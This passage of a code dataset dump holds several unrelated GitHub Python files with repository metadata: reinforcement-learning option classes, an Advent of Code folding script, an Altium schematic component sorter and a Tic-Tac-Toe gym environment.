clear=False):\r\n # checks and prepares for saving option as a pickle\r\n policy = self.policy\r\n if len(save_dir) > 0:\r\n try:\r\n os.makedirs(save_dir)\r\n except OSError:\r\n pass\r\n env = self.environment_model.environment\r\n self.environment_model.environment = None\r\n self.policy.cpu() \r\n self.policy.save(save_dir, self.object_name +\"_policy\")\r\n print(self.iscuda)\r\n if self.iscuda:\r\n self.policy.cuda()\r\n if clear:\r\n self.policy = None# removes the policy and rollouts for saving\r\n self.environment_model.environment = env\r\n return policy\r\n return None, None\r\n\r\n def load_policy(self, load_dir):\r\n if len(load_dir) > 0:\r\n self.policy = torch.load(os.path.join(load_dir, self.object_name +\"_policy.pt\"))\r\n print(self.policy)\r\n\r\n\r\n\r\nclass PrimitiveOption(Option): # primative discrete actions\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, action_featurizer=None, param_first=False, no_input=False):\r\n self.num_params = models[1].environment.num_actions\r\n self.object_name = \"Action\"\r\n self.action_featurizer = action_featurizer\r\n environment = models[1].environment\r\n self.action_space = models[1].environment.action_space\r\n self.action_shape = environment.action_space.shape or (1,)\r\n self.action_prob_shape = environment.action_space.shape or (1,)\r\n self.output_prob_shape = environment.action_space.shape or environment.action_space.n# (models[1].environment.num_actions, )\r\n print(self.action_shape[0])\r\n self.action_mask = np.ones(self.action_shape)\r\n self.discrete = self.action_shape[0] == 1\r\n self.discrete_actions = models[1].environment.discrete_actions\r\n self.control_max = environment.action_space.n if self.discrete_actions else environment.action_space.high\r\n self.control_min = None if self.discrete_actions else environment.action_space.low\r\n self.action_max = environment.action_space.shape or environment.action_space.n\r\n self.next_option = None\r\n self.iscuda = False\r\n self.policy = None\r\n self.dataset_model = None\r\n self.time_cutoff = 1\r\n self.rollouts = None\r\n self.terminated = True\r\n\r\n\r\n def save(self, save_dir, clear=False):\r\n return None\r\n\r\n def load_policy(self, load_dir):\r\n pass\r\n\r\n def set_behavior_epsilon(self, epsilon):\r\n pass\r\n\r\n def step(self, last_state, chain):\r\n pass\r\n\r\n def record_state(self, state, next_state, action_chain, rl_outputs, param, rewards, dones):\r\n pass\r\n\r\n def cpu(self):\r\n self.iscuda = False\r\n\r\n def cuda(self):\r\n self.iscuda = True\r\n\r\n def get_possible_parameters(self):\r\n if self.iscuda:\r\n return [(torch.tensor([i]).cuda(), torch.tensor([1]).cuda()) for i in range(self.num_params)]\r\n return [(torch.tensor([i]), torch.tensor([1])) for i in range(self.num_params)]\r\n\r\n def sample_action_chain(self, batch, state, random=False, force=False, preserve=False, use_model=False): # param is an int denoting the primitive action, not protected (could send a faulty param)\r\n param = batch['param']\r\n if self.discrete_actions:\r\n sq_param = int(param.squeeze())\r\n else:\r\n sq_param = param.squeeze()\r\n if random:\r\n sq_param = self.action_space.sample()\r\n chain = [sq_param]\r\n return sq_param, chain, None, list(), True # chain is the action as an int, policy batch is None, state chain is a list, resampled is True\r\n\r\n def terminate_reward(self, state, next_state, param, chain, mask=None, 
needs_reward=False):\r\n return [1], [0], [1]\r\n\r\n def predict_state(self, factored_state, raw_action):\r\n new_action = copy.deepcopy(factored_state[\"Action\"])\r\n new_action = self.action_featurizer.assign_feature({\"Action\": new_action}, raw_action, factored=True)\r\n return [1], new_action\r\n\r\n\r\nclass RawOption(Option):\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device = -1, param_first=False, no_input=False):\r\n super().__init__(policy_reward, models, object_name, temp_ext=temp_ext, relative_actions=relative_actions, relative_state=relative_state,\r\n relative_param=relative_param, discretize_acts=discretize_acts, param_first=param_first, no_input=no_input)\r\n self.object_name = \"Raw\"\r\n self.action_shape = (1,)\r\n self.action_prob_shape = (self.environment_model.environment.num_actions,)\r\n self.discrete_actions = self.environment_model.environment.discrete_actions\r\n self.action_max = self.environment_model.environment.action_space.n if self.discrete_actions else self.environment_model.environment.action_space.high\r\n self.action_space = self.environment_model.environment.action_space\r\n self.control_max = 0 # could put in \"true\" parameter, unused otherwise\r\n self.discrete = False # This should not be used, since rawoption is not performing parameterized RL\r\n self.use_mask = False\r\n self.stack = torch.zeros((4,84,84))\r\n # print(\"frame\", self.environment_model.environment.get_state()['Frame'].shape)\r\n # self.param = self.environment_model.get_param(self.environment_model.environment.get_state()[1])\r\n self.param = self.environment_model.get_param(self.environment_model.environment.get_state())\r\n\r\n # def get_state_dict(self, state, next_state, action_chain, rl_outputs, param, rewards, dones, termination): # also used in HER\r\n # return {'state': self.get_state(state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'next_state': self.get_state(next_state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'object_state': state[\"Object\"],\r\n # 'next_object_state': next_state[\"Object\"],\r\n # 'state_diff': state[\"Action\"], # storing some dummy information\r\n # 'true_action': action_chain[0],\r\n # 'true_reward': rewards[0],\r\n # 'true_done': dones[0],\r\n # 'action': action_chain[-1],\r\n # 'probs': None if rl_outputs[-1].probs is None else rl_outputs[-1].probs[0],\r\n # 'Q_vals': None if rl_outputs[-1].Q_vals is None else rl_outputs[-1].Q_vals[0],\r\n # 'param': param, \r\n # 'mask': self.dataset_model.get_active_mask(), \r\n # 'termination': termination[-1],\r\n # 'reward': rewards[-1], \r\n # 'done': dones[-1]}\r\n\r\n def assign_param(self, state, param):\r\n return self.param_process(state, param)\r\n\r\n def get_param(self, full_state, terminate, force=False):\r\n if terminate or force:\r\n self.param = self.environment_model.get_param(full_state)\r\n return self.param, [1], True\r\n return self.param, [1], False\r\n\r\n def get_possible_parameters(self):\r\n if self.iscuda:\r\n return [(torch.tensor([1]).cuda(), torch.tensor([1]).cuda())]\r\n return [(torch.tensor([1]), torch.tensor([1]))]\r\n\r\n def cuda(self):\r\n super().cuda()\r\n # self.stack = self.stack.cuda()\r\n\r\n def get_state(self, full_state = None, form=1, inp=0, rel=0, param=None):\r\n if not full_state: return self.environment_model.get_state()['raw_state']\r\n if type(full_state) is list or type(full_state) is np.ndarray: \r\n if inp == 1:\r\n return 
np.array([self.environment_model.get_object(f) for f in full_state])\r\n return np.array([f['raw_state'] for f in full_state])\r\n else:\r\n if inp == 1:\r\n return self.environment_model.get_object(full_state)\r\n return full_state['raw_state']\r\n\r\n def get_input_state(self):\r\n # stack = stack.roll(-1,0)\r\n # stack[-1] = pytorch_model.wrap(self.environment_model.environment.frame, cuda=self.iscuda)\r\n # input_state = stack.clone().detach()\r\n\r\n input_state = self.get_state(self.environment_model.get_state())\r\n return input_state\r\n\r\n\r\n def sample_action_chain(self, batch, state_chain, random=False, force=False, preserve=False, use_model=False):\r\n '''\r\n Takes an action in the state, only accepts single states. Since the initiation condition extends to all states, this is always callable\r\n also returns whether the current state is a termination condition. The option will still return an action in a termination state\r\n The temporal extension of options is exploited using temp_ext, which first checks if a previous option is still running, and if so returns the same action as before\r\n '''\r\n # input_state = pytorch_model.wrap(self.environment_model.environment.frame, cuda=self.iscuda)\r\n # self.stack = self.stack.roll(-1,0)\r\n # self.stack[-1] = input_state\r\n # input_state = self.stack.clone()\r\n if random:\r\n act = self.action_space.sample()\r\n policy_batch = None\r\n state = None\r\n else:\r\n batch['obs'] = self.get_state(batch['full_state'])\r\n # batch['next_obs'] = self.get_state(batch['next_full_state'])\r\n state = None if state_chain is None else state_chain[-1]\r\n policy_batch = self.policy.forward(batch, state) # uncomment this\r\n act = policy_batch.act\r\n state = [policy_batch.state] if state is not None else None\r\n # get the action from the behavior policy, baction is integer for discrete\r\n act = to_numpy(act)\r\n act = self.policy.exploration_noise(act, batch)\r\n act = act.squeeze()\r\n\r\n # input_state = pytorch_model.wrap(self.environment_model.get_raw_state(state), cuda=self.iscuda)\r\n # print(\"raw_state\", self.environment_model.get_raw_state(state), input_state)\r\n # if len(param.shape) == 1:\r\n # param = param.unsqueeze(0)\r\n # rl_output = self.policy.forward(input_state.unsqueeze(0), param) # uncomment later\r\n # rl_output = policy.forward(input_state.unsqueeze(0), param)\r\n # print(\"forwarded\")\r\n # baction = self.behavior_policy.get_action(rl_output)\r\n chain = [act]\r\n # print(chain)\r\n return act, chain, policy_batch, state, True # resampled is always true since there is no temporal extension\r\n\r\n def terminate_reward(self, state, next_state, param, chain, mask=None, needs_reward=False):\r\n # print(state)\r\n return state[\"factored_state\"][\"Done\"], state[\"factored_state\"][\"Reward\"], state[\"factored_state\"][\"Done\"]\r\n # return [int(self.environment_model.environment.done or self.timer == (self.time_cutoff - 1))], [self.environment_model.environment.reward]#, torch.tensor([self.environment_model.environment.reward]), None, 1\r\n\r\n # The definition of this function has changed\r\n def get_action(self, action, mean, variance):\r\n idx = action\r\n return mean[torch.arange(mean.size(0)), idx.squeeze().long()], None#torch.log(mean[torch.arange(mean.size(0)), idx.squeeze().long()])\r\n\r\nclass ModelCounterfactualOption(Option):\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, 
device=-1, param_first=False, no_input=False):\r\n super().__init__(policy_reward, models, object_name, temp_ext=temp_ext, relative_actions=relative_actions, relative_state=relative_state,\r\n relative_param=relative_param, discretize_acts=discretize_acts, param_first=param_first, no_input=no_input)\r\n self.action_prob_shape = self.next_option.output_prob_shape\r\n if self.discrete_actions:\r\n self.action_shape = (1,)\r\n else:\r\n self.action_shape = self.next_option.output_prob_shape\r\n print(self.next_option.control_max)\r\n self.action_max = np.array(self.next_option.control_max)\r\n self.action_min = np.array(self.next_option.control_min)\r\n self.control_max = np.array(self.dataset_model.control_max)\r\n self.control_min = np.array(self.dataset_model.control_min)\r\n self.policy_min = -1 * np.ones(self.action_min.shape) # policy space is always the same\r\n self.policy_max = 1 * np.ones(self.action_min.shape)\r\n self.expand_policy_space = False\r\n if self.next_option.object_name != \"Action\":\r\n self.expand_policy_space = True\r\n\r\n # if we are converting the space to be discrete. If discretize_acts is a dict, use it directly\r\n if type(discretize_acts) == dict:\r\n self.discrete_dict = discretize_acts \r\n elif discretize_acts:\r\n self.discrete_dict = discretize_actions(self.action_min.shape)\r\n\r\n if type(discretize_acts) == dict:\r\n acts = np.stack([v for v in self.discrete_dict.values()], axis = 0)\r\n self.action_min = np.min(acts, axis=0)\r\n self.action_max = np.max(acts, axis=0)\r\n self.policy_action_space = gym.spaces.Discrete(len(list(self.discrete_dict.keys())))\r\n self.policy_action_shape = (1,)\r\n self.action_shape = self.action_min.shape\r\n self.action_space = gym.spaces.Box(self.action_min, self.action_max)\r\n self.relative_action_space = gym.spaces.Discrete(len(list(self.discrete_dict.keys()))) # This should not be used\r\n else:\r\n if self.discrete_actions and discretize_acts:\r\n self.policy_action_space = gym.spaces.Discrete(len(list(self.discrete_dict.keys())))\r\n if self.discrete_actions and not discretize_acts:\r\n self.policy_action_space = gym.spaces.Discrete(self.next_option.control_max)\r\n self.action_space = gym.spaces.Discrete(self.next_option.control_max)\r\n self.relative_action_space = gym.spaces.Discrete(self.next_option.control_max) # no relative actions for discrete\r\n if (self.discrete_actions and discretize_acts) or not self.discrete_actions:\r\n self.action_space = gym.spaces.Box(self.action_min, self.action_max)\r\n rng = self.action_max - self.action_min\r\n self.relative_action_space = gym.spaces.Box(-rng / self.range_limiter, rng / self.range_limiter)\r\n print(self.action_min, self.action_max)\r\n if not self.discrete_actions:\r\n self.policy_action_space = gym.spaces.Box(self.policy_min, self.policy_max)\r\n self.policy_action_shape = self.policy_min.shape\r\n self.last_action = np.zeros(self.action_shape)\r\n if self.discrete_actions:\r\n self.last_action = np.zeros(self.action_shape)[0]\r\n self.last_act = np.zeros(self.policy_action_shape)\r\n print(self.last_action, self.last_act, self.discrete_actions, self.action_shape, self.action_min, self.control_min, self.policy_min)\r\n \r\n \r\n self.output_prob_shape = (self.dataset_model.delta.output_size(), ) # continuous, so the size will match\r\n # TODO: fix this so that the output size is equal to the nonzero elements of the self.dataset_model.selection_binary() at each level\r\n\r\n # force all previous options to have zero \r\n 
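The constructor above pins the learned policy to a normalized Box in [-1, 1] (`policy_min`/`policy_max`) regardless of the true action range. The usual way such a normalized action is rescaled before execution is an affine map; the sketch below is a generic illustration of that pattern, not the actual body of `policy.map_action`, which lives outside this file:

import numpy as np

def map_action(policy_act, low, high):
    """Rescale an action from the normalized [-1, 1] policy space to [low, high]."""
    return low + (np.clip(policy_act, -1.0, 1.0) + 1.0) * 0.5 * (high - low)

def reverse_map_action(env_act, low, high):
    """Inverse mapping, from environment space back to [-1, 1]."""
    return (env_act - low) / (high - low) * 2.0 - 1.0

low, high = np.array([0.0, -2.0]), np.array([4.0, 2.0])
a = map_action(np.array([0.0, 1.0]), low, high)          # -> [2., 2.]
assert np.allclose(reverse_map_action(a, low, high), [0.0, 1.0])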
self.next_option.set_behavior_epsilon(0)\r\n\r\n def set_behavior_epsilon(self, epsilon):\r\n if self.policy is not None:\r\n self.policy.set_eps(epsilon)\r\n if self.next_option is not None and self.next_option.policy is not None:\r\n self.next_option.set_behavior_epsilon(epsilon)\r\n\r\n def get_cont(self, act):\r\n if self.discretize_actions:\r\n if type(act) == np.ndarray:\r\n return np.array([self.discrete_dict[a].copy() for a in act])\r\n return self.discrete_dict[act].copy()\r\n\r\n def get_discrete(self, act):\r\n def find_closest(a):\r\n closest = (-1, 99999999)\r\n for i in range(len(list(self.discrete_dict.keys()))):\r\n dist = np.linalg.norm(a - np.array(self.discrete_dict[i]))\r\n if dist < closest[1]:\r\n closest = (i,dist)\r\n return closest[0]\r\n if self.discretize_actions:\r\n if type(act) == np.ndarray and len(act.shape) > 1:\r\n return np.array([find_closest(a) for a in act])\r\n return find_closest(act)\r\n\r\n\r\n def get_action(self, action, mean, variance):\r\n if self.discrete_actions:\r\n return mean[torch.arange(mean.size(0)), action.squeeze().long()], torch.log(mean[torch.arange(mean.size(0)), action.squeeze().long()])\r\n idx = action\r\n dist = torch.distributions.normal.Normal # TODO: hardcoded action distribution as diagonal gaussian\r\n log_probs = dist(mean, variance).log_probs(action)\r\n return torch.exp(log_probs), log_probs\r\n\r\n def get_critic(self, state, action, mean):\r\n return self.policy.compute_Q(state, action)\r\n\r\nclass ForwardModelCounterfactualOption(ModelCounterfactualOption):\r\n ''' Uses the forward model to choose the action '''\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, param_first=False, no_input=False):\r\n super().__init__(policy_reward, models, object_name, temp_ext=temp_ext, relative_actions = relative_actions, relative_state=relative_state, \r\n relative_param=relative_param, discretize_acts=discretize_acts, device=device, param_first=param_first, no_input=no_input)\r\n self.sample_per = 5\r\n self.max_propagate = 3\r\n self.epsilon_reward = .1\r\n self.time_range = list(range(0, 1)) # timesteps to sample for interaction/parameter (TODO: negative not supported)\r\n self.uniform = True\r\n self.stepsize = 2\r\n self.use_true_model = False\r\n if self.use_true_model:\r\n self.dummy_env_model = copy.deepcopy(self.environment_model)\r\n if not self.discrete_actions: # sample all discrete actions if action space is discrete\r\n self.var = 6 # samples uniformly in a range around the target position, altering the values of mask\r\n\r\n def single_step_search(self, center, mask):\r\n # weights for possible deviations uniformly around the center, and center (zero)\r\n if self.uniform:\r\n num = (self.var * 2) // self.stepsize + 1\r\n vals = np.stack([np.linspace(-self.var, self.var, num ) for i in range(self.next_option.mask.shape[0])], axis=1)\r\n samples = center + vals * mask\r\n else:\r\n vals = (np.random.rand(*[self.sample_per] + list(self.next_option.mask.shape)) - .5) * 2\r\n samples = center + vals * self.var * mask\r\n # samples are around the center with max dev self.var but only changing masked values\r\n \r\n # print(vals * self.var, mask)\r\n # print(center, samples)\r\n return samples\r\n\r\n def predict_state(self, factored_state, raw_action):\r\n if self.use_true_model:\r\n expand = False\r\n if type(factored_state) == Batch and len(factored_state.shape) > 1:\r\n expand = True\r\n 
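A standalone restatement of `single_step_search` above: it proposes counterfactual object states by sweeping a uniform grid around a predicted center, perturbing only the masked (controllable) dimensions. The `var`/`stepsize` defaults mirror the values set in the constructor; the 2D center is made up:

import numpy as np

def single_step_search(center, mask, var=6.0, stepsize=2.0):
    """Candidate states on a uniform grid around `center`, varying only masked dims."""
    num = int((var * 2) // stepsize + 1)              # grid points per sweep
    vals = np.stack([np.linspace(-var, var, num)
                     for _ in range(center.shape[0])], axis=1)
    return center + vals * mask                       # unmasked dims stay at center

center = np.array([3.0, 5.0])
mask = np.array([1.0, 0.0])   # only the first coordinate is controllable
print(single_step_search(center, mask))
# column 0 sweeps 3 +/- 6 in steps of 2; column 1 stays fixed at 5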
factored_state = factored_state[0] # TODO: only supports expanded by 2\r\n self.dummy_env_model.set_from_factored_state(factored_state)\r\n with suppress_stdout_stderr():\r\n full_state, rew, done, info = self.dummy_env_model.step(raw_action)\r\n if expand:\r\n return None, Batch([full_state['factored_state']])\r\n return None, Batch(full_state['factored_state'])\r\n else:\r\n return super().predict_state(factored_state, raw_action)\r\n\r\n def collect(self, full_state):\r\n # search by calling single step search time range number of times\r\n all_samples = list()\r\n all_orig = list()\r\n factored_state = full_state['factored_state']\r\n for i in self.time_range:\r\n # gather samples around the given state reached\r\n # print(factored_state)\r\n inters, next_factored_state = self.predict_state(factored_state, 0) # TODO: raw action hacked to no-op for now\r\n next_factored_state = self.np_state(next_factored_state)\r\n full_state = {\"factored_state\": next_factored_state, \"PARTIAL\": 1}\r\n center = self.next_option.get_state(full_state, setting=self.next_option.output_setting, factored=True)\r\n obj_samples = self.single_step_search(center, self.next_option.mask)\r\n # for each of the samples, broadcast the object state\r\n broadcast_obj_state = np.stack([next_factored_state[self.object_name].copy() for i in range(len(obj_samples))], axis=0)\r\n # print(next_factored_state[self.object_name].copy(), broadcast_obj_state, obj_samples)\r\n # factored state with only the pair of objects needed, because we ONLY forward predict the next factored state of the current object\r\n all_samples.append({self.object_name: broadcast_obj_state, self.next_option.object_name: obj_samples})\r\n all_orig.append({self.object_name: next_factored_state[self.object_name].copy(), self.next_option.object_name: center})\r\n factored_state = Batch(next_factored_state)\r\n\r\n # returns the factored states, the first is giving back the original state, but propagated for the time range, the second is the factored state for the samples\r\n return ( Batch({self.object_name: np.stack([all_orig[i][self.object_name] for i in range(len(all_orig))], axis=0), \r\n self.next_option.object_name: np.stack([all_orig[i][self.next_option.object_name] for i in range(len(all_orig))], axis=0)}), \r\n Batch({self.object_name: np.concatenate([all_samples[i][self.object_name] for i in range(len(all_samples))], axis=0), \r\n self.next_option.object_name: np.concatenate([all_samples[i][self.next_option.object_name] for i in range(len(all_samples))], axis=0)}))\r\n \r\n def enumerate_rewards(self, factored_state):\r\n # outputs the rewards, and the action state (state that can be converted to an action by the CURRENT option)\r\n inters, preds = self.dataset_model.predict_next_state(factored_state)\r\n state = {\"factored_state\": factored_state, \"PARTIAL\": 1} # hopefully limited factored state is sufficient\r\n input_state = self.get_state(state, setting=self.inter_setting, factored=True)\r\n action_state = self.next_option.get_state(state, setting=self.next_option.output_setting, factored=True)\r\n # print(\"enum\", preds, state, action_state)\r\n object_state = pytorch_model.unwrap(preds)\r\n # get the first action\r\n # print(input_state, object_state, self.mask, self.param)\r\n rewards = self.reward.get_reward(input_state, object_state, self.param, self.mask, 0)\r\n return action_state, rewards\r\n\r\n def propagate_state(self, batch, state_chain, mapped_act):\r\n '''\r\n roll forward until time limit or we hit the end of temporal 
extension, then start guessing future states\r\n '''\r\n state = copy.deepcopy(batch['full_state'])\r\n input_state = self.next_option.get_state(state, setting=self.next_option.inter_setting, factored=True)\r\n object_state = self.next_option.get_state(state, setting=self.next_option.output_setting, factored=True)\r\n # get the first action\r\n act, chain, policy_batch, pol_state, resampled = self.sample_action_chain(batch, state_chain, preserve=True)\r\n # print(mapped_act, chain[-1])\r\n # if self.mask is None:\r\n # self.mask = self.dataset_model.get_active_mask() # doesn't use the sampler's mask\r\n # while we haven't reached the target location\r\n timer = 0\r\n term = False\r\n factored_state = state['factored_state']\r\n while (timer < self.max_propagate and not term):\r\n # get the next state\r\n # print(\"curr fac\", Batch(factored_state))\r\n inters, factored_state = self.predict_state(factored_state, chain[0]) # TODO: add optional replacement with predictions from environment model\r\n factored_state = self.np_state(factored_state)\r\n state = {\"factored_state\": factored_state, \"PARTIAL\": 1} # hopefully limited factored state is sufficient\r\n input_state = self.next_option.get_state(state, setting=self.next_option.inter_setting, factored=True)\r\n object_state = self.next_option.get_state(state, setting=self.next_option.output_setting, factored=True)\r\n # get the first action\r\n batch = copy.deepcopy(batch) # TODO: is copy inefficient?\r\n batch.update(full_state = [state], obs = self.get_state(state, setting=self.input_setting, factored=True, param=self.param))\r\n # print(batch)\r\n act, chain, policy_batch, pol_state, resampled = self.sample_action_chain(batch, state_chain, preserve=True, use_model=False)\r\n # print(\"input_state\", self.object_name, input_state)\r\n term = self.next_option.termination.check(input_state, object_state, self.next_option.convert_param(chain[-1]), self.next_option.mask, 0)\r\n factored_state = Batch([factored_state])\r\n timer += 1\r\n # print(timer, self.max_propagate, term, factored_state, chain)\r\n state = {\"factored_state\": factored_state, \"PARTIAL\": 1}\r\n return state\r\n\r\n def search(self, batch, state_chain, act, mapped_act):\r\n # print(\"starting\", act, mapped_act)\r\n full_state = self.propagate_state(batch, state_chain, mapped_act)\r\n base_factored_states, sample_factored_states = self.collect(full_state)\r\n # print(base_factored_states, sample_factored_states)\r\n sample_action_state, sample_rewards = self.enumerate_rewards(sample_factored_states)\r\n base_action_state, base_rewards = self.enumerate_rewards(base_factored_states)\r\n def convert_state_to_action(obj_state):\r\n # TODO: assumes that obj_state is in the order of mask, which is NOT a given\r\n act = list()\r\n for cfs in self.next_option.dataset_model.cfselectors:\r\n # print(cfs.feature_selector(obj_state))\r\n act.append(cfs.feature_selector(obj_state)[0])\r\n return np.array(act)\r\n\r\n best_given_reward = np.max(base_rewards)\r\n best_sampled_reward = np.max(sample_rewards)\r\n # print(best_given_reward, best_sampled_reward)\r\n if best_given_reward + self.epsilon_reward > best_sampled_reward: # if no places have reward, return the action given\r\n # print(\"sending back given\", act, mapped_act)\r\n return act, mapped_act\r\n else:\r\n best_sampled_at = np.argmax(sample_rewards)\r\n new_act_dict = {self.next_option.object_name: sample_action_state[best_sampled_at]}\r\n new_mapped_act = convert_state_to_action(new_act_dict)\r\n new_act = 
self.reverse_map_action(new_mapped_act, batch)\r\n # print(\"new_selection\", new_act_dict, new_act[0], new_mapped_act, act, mapped_act)\r\n return new_act[0], mapped_act\r\n\r\n def sample_action_chain(self, batch, state_chain, random=False, force=False, use_model = False, preserve=False):\r\n return super().sample_action_chain(batch, state_chain, random=random, force=force, use_model=True, preserve=preserve)\r\n\r\n\r\n\r\n\r\noption_forms = {'model': ModelCounterfactualOption, \"raw\": RawOption, 'forward': ForwardModelCounterfactualOption}","repo_name":"CalCharles/counterfactual-options","sub_path":"Options/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":64734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27270283757","text":"\nimport numpy as np\nimport common\n\nfile = open(\"./day13/data.txt\")\nlines = file.readlines()\n\n( dots, axises) = common.parseData( lines )\n\nprint( dots )\nprint( axises )\n\nnDots = dots.shape[1]\nprint( nDots )\n\nfor axis in axises:\n\n axis = np.tile( axis, ( nDots, 1))\n dots = dots - axis.transpose()\n\n if axis[0][0] == 0: dots[1,:] = -np.abs( dots[1,:] )\n else: dots[0,:] = -np.abs( dots[0,:] )\n\n dots = dots + axis.transpose()\n #break\n\ndots = np.unique( dots, axis = 1)\nnDots = len( dots.transpose() )\n\nprint( nDots )\n\ncommon.plotDots( dots)\n\n","repo_name":"ththarkonen/advent-of-code-2021","sub_path":"day13/thermal.py","file_name":"thermal.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7969232480","text":"import logging\nimport glob\nfrom sch_doc_parser.src.python_schdoc.schdoc import Schematic\nfrom sch_doc_parser.src.python_schlib.schlib import SchematicLib\nfrom sch_doc_parser.src.data_extractor import SchematicComponentExtractor, SchematicLibComponentExtractor, ComponentData\n\n\nclass ComponentSorter:\n def __init__(self, project_path):\n self.project_path = project_path\n\n def extract_sorted_components(self):\n schdoc_files = self.get_schdoc_files_path()\n schlib_files = self.get_schlib_files_path()\n file_components = []\n lib_components = []\n for schdoc_file in schdoc_files:\n schdoc = Schematic(schdoc_file).read()\n file_components.extend(SchematicComponentExtractor(schdoc).components)\n logging.info(f'Finish extract component from {schdoc_file.rsplit(\"/\", 1)[-1]}')\n for schlib_file in schlib_files:\n schlib = SchematicLib(schlib_file).read()\n lib_components.append(SchematicLibComponentExtractor(schlib).get_component())\n logging.info('Components extraction completed. 
Start component sorting...')\n bom_components = self.sort_components(file_components)\n for bom_component in bom_components:\n if not bom_component.part_number:\n for lib_component in lib_components:\n if lib_component.libref == bom_component.libref:\n bom_component.part_number = lib_component.part_number\n bom_component.manufacturer = lib_component.manufacturer if not bom_component.manufacturer else\\\n bom_component.manufacturer\n bom_component.description = lib_component.description if not bom_component.description else\\\n bom_component.description\n logging.info('Finish component sorting')\n return bom_components, file_components\n\n def get_schdoc_files_path(self):\n files = [file for file in glob.glob(f'{self.project_path}/**/*.SchDoc', recursive=True)]\n return files\n\n def get_schlib_files_path(self):\n files = [file for file in glob.glob(f'{self.project_path}/**/*.SchLib', recursive=True)]\n return files\n\n def sort_components(self, file_components: list[ComponentData]):\n bom_components = [file_components.pop(0)]\n for file_component in file_components:\n if file_component.part_number:\n for bom_component in bom_components:\n if bom_component.part_number and bom_component.part_number == file_component.part_number:\n self.check_designators(bom_component, file_component)\n break\n else:\n bom_components.append(file_component)\n elif file_component.comment:\n for bom_component in bom_components:\n if bom_component.comment and bom_component.comment == file_component.comment:\n self.check_designators(bom_component, file_component)\n break\n else:\n bom_components.append(file_component)\n elif file_component.footprint:\n for bom_component in bom_components:\n if bom_component.footprint and bom_component.footprint == file_component.footprint:\n self.check_designators(bom_component, file_component)\n break\n else:\n bom_components.append(file_component)\n return bom_components\n\n @staticmethod\n def check_designators(bom_component, file_component):\n if isinstance(bom_component.designator, str):\n if bom_component.designator != file_component.designator:\n bom_designator = bom_component.designator\n file_designator = file_component.designator\n bom_component.designator = [bom_designator, file_designator]\n bom_component.part_count = 2\n for key, value in file_component.properties.items():\n if key not in bom_component.properties:\n bom_component.properties.update({key: value})\n elif isinstance(bom_component.designator, list):\n for bom_designator in bom_component.designator:\n if bom_designator == file_component.designator:\n break\n else:\n bom_component.designator.append(file_component.designator)\n for key, value in file_component.properties.items():\n if key not in bom_component.properties:\n bom_component.properties.update({key: value})\n bom_component.part_count += 1\n else:\n logging.error(f'Component does not have designator!!! 
{bom_component}')\n","repo_name":"lvan-s/sch_doc_component_extractor","sub_path":"sch_doc_parser/src/data_sorter.py","file_name":"data_sorter.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18646122244","text":"import gym\nfrom gym import spaces\nfrom stable_baselines3 import PPO\nimport numpy as np\nimport random\nfrom stable_baselines3.common.vec_env import DummyVecEnv\nfrom TicTacToe import get_legal_moves\n\n# create the environment\nclass LearningTicTacToe(gym.Env):\n \"\"\"Tic Tac Toe game environment\"\"\"\n # training against PPO Model\n\n BOARD_SIZE = 3\n # reward values\n TIE_REWARD = 0.5\n WIN_REWARD = 1\n LOSE_REWARD = -1\n ILLEGAL = -2\n MOVE = 0.1 # reward for placing on a empty spot\n\n def __init__(self, model, train: bool = True):\n self.model = model\n\n self.action_space = spaces.Discrete(self.BOARD_SIZE ** 2)\n self.observation_space = spaces.Box(low=-1, high=1,\n shape=(self.BOARD_SIZE ** 2 + self.BOARD_SIZE ** 2,),\n dtype=np.float32)\n\n self.board = np.zeros((self.BOARD_SIZE, self.BOARD_SIZE))\n self.player = 1\n self.legal_moves = list(range(self.BOARD_SIZE ** 2))\n self.winner = None\n self.train = train\n\n def step(self, action: int):\n row = action // self.BOARD_SIZE\n col = action % self.BOARD_SIZE\n\n if self.board[row][col] == 0:\n self.board[row][col] = self.player\n done, tie = self.is_game_over()\n reward = self.get_reward(done, tie)\n self.player = -self.player\n\n if done:\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n if not self.legal_moves:\n done = True\n reward = self.TIE_REWARD\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n # Update legal moves\n self.legal_moves.remove(action)\n\n # have player two move based on model provided\n if self.train:\n action, _states = self.model.predict(\n np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), deterministic=True)\n\n row = action // self.BOARD_SIZE\n col = action % self.BOARD_SIZE\n if self.board[row][col] != 0:\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), 0, True, {}\n self.board[row][col] = self.player\n done, tie = self.is_game_over()\n reward = self.get_reward(done, tie)\n self.player = -self.player\n\n if done:\n return np.concatenate(\n (self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n # out of moves(tie)\n if not self.legal_moves:\n done = True\n reward = self.TIE_REWARD\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n # Invalid move, penalize and end the game\n else:\n done = True\n reward = self.ILLEGAL\n obs = np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board))))\n if self.train:\n self.reset() # call reset function to reset the environment\n self.reset() # call reset function to reset the environment\n return obs, reward, done, {}\n\n def reset(self):\n self.board = np.zeros((self.BOARD_SIZE, self.BOARD_SIZE))\n self.player = 1\n self.legal_moves = 